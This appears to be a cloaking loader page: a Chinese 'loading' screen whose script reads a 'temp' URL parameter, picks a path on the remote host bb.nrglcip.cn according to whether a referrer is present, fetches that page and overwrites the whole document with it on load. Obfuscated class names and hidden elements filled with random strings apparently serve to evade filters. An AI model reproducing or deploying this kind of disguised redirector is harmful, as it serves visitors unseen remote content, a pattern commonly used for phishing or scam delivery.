<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SSYBdrcnA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SSYBdrcnA .pCt0CWjrpvT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SSYBdrcnA .content {
            line-height: 50px;
            text-align: center
        }

        .SSYBdrcnA .img {
            width: 100%
        }

        .SSYBdrcnA .AWzT8rDT {
            text-align: center
        }

        .SSYBdrcnA .AWzT8rDT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SSYBdrcnA .AWzT8rDT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SSYBdrcnA .AWzT8rDT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SSYBdrcnA .AWzT8rDT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SSYBdrcnA .AWzT8rDT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SSYBdrcnA .AWzT8rDT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SSYBdrcnA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function JVDGzbtmV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bdZ0lz = JVDGzbtmV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bdZ0lz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bdZ0lz +".html?a=share";
		}
		
        SjPMvj0e=url+"#"+new Date().getTime();
        SjPMvj0e && function() {
            $.get(SjPMvj0e, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >febRuABXlQsU41IhPpJTlb61HvRXGuFcZfyzuU24C8vonQU4JixvtbPpPYwTCgYPtisYiZP4MGZE1GSuSinYLWKURgej0v</b>
<ul style='display:none' >yN1uoCbtLIJiCqI8uhytRrjB8QBJrEx8sPYk6UwMC8e4KGqkPn3l2xBSgJ7YP9haOOmij3FDSs8SH</ul>
<a  href='#' style='display:none'>Va8qyZ4JaawomtbDVzna4Jc1wn05jmjuUMHpSdmPX4</a><div class="SSYBdrcnA">
    <div class="pCt0CWjrpvT">
        <div class="AWzT8rDT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >fjfTyYLIHtMR2hG6s42UWEKQOmZqWzgMz6K5F5rDtv3arRPPWyj65J2F</li>
<p  style='display:none'>ceOGf8lTnLQ2FjwcfjnhFn8GZ3whYIvkG8ZRs7rJBsuExJLzBCnX7C9BIrGO</p>
<ul style='display:none' >vBiJQSxYjrYLYfo0XyQ2jVPWhpgpAZ8UtbThiKAzpp6Oo</ul>
<li style='display:none' >fjfTyYLIHtMR2hG6s42UWEKQOmZqWzgMz6K5F5rDtv3arRPPWyj65J2F</li>
<b style='display:none' >wvSaX2oo6h6gd4IjVxPfrbP0FxC6cEMp9tooKizaXQsTQiPH2TUwuwe7YK1fa51wqQM1GD4mLAaemcQ0R497gDUK</b></body>
</html>